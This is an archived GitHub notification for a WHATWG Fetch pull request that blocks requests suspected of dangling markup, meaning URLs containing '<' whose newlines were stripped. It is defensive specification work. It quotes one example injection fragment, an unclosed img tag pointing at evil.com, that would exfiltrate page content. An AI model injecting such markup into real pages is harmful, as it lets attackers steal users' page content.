[whatwg/fetch] Block requests for suspected dangling markup. (#519) from Mike West on 2017-03-28 (public-webapps-github@w3.org from March 2017)

From: Mike West <notifications@github.com>
Date: Tue, 28 Mar 2017 06:12:36 -0700
To: whatwg/fetch <fetch@noreply.github.com>
Cc: Subscribed <subscribed@noreply.github.com>
Message-ID: <whatwg/fetch/pull/519@github.com>

As a mitigation against dangling markup attacks (which inject open tags like
`<img src='https://evil.com/` that eat up subsequent markup, and exfiltrate
content to an attacker), this patch tightens request processing to reject
those that contain a `<` character (consistent with an HTML element), _and_
had newline characters stripped during URL parsing (see whatwg/url#284).

It might be possible to URLs whose newline characters were stripped entirely,
based on initial metrics. If those pan out the way I hope, we can tighten
this up in the future.
You can view, comment on, or merge this pull request online at:

  https://github.com/whatwg/fetch/pull/519

-- Commit Summary --

  * Block requests for suspected dangling markup.

-- File Changes --

    M fetch.bs (4)

-- Patch Links --

https://github.com/whatwg/fetch/pull/519.patch
https://github.com/whatwg/fetch/pull/519.diff

-- 
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/whatwg/fetch/pull/519

Received on Tuesday, 28 March 2017 13:13:10 UTC